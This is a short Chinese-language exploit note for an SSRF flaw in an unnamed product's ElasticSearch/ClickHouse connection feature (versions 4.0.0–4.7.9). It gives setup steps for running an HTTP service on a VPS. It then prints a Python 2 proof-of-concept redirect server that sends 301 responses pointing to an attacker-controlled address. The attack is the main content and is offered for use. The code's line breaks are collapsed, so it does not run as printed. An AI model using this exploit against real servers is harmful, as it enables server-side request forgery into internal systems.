在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。
VPS开启HTTP服务
VPS 开启HTTP 再同时跑POC
确保能访问poc里的链接文件
第一是目标地址
第二个是跳转地址
第三个是监听地址
如果想切换监听端口
poc:
import SimpleHTTPServer
import SocketServerdef redirect_handler_factory(url):class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header('Location', url)self.end_headers()return RedirectHandlerdef main():redirectHandler = redirect_handler_factory("http://192.168.62.143:8000/1.txt")handler = SocketServer.TCPServer(("", 80), redirectHandler)print("serving at port 80")handler.serve_forever()if __name__ == "__main__":main()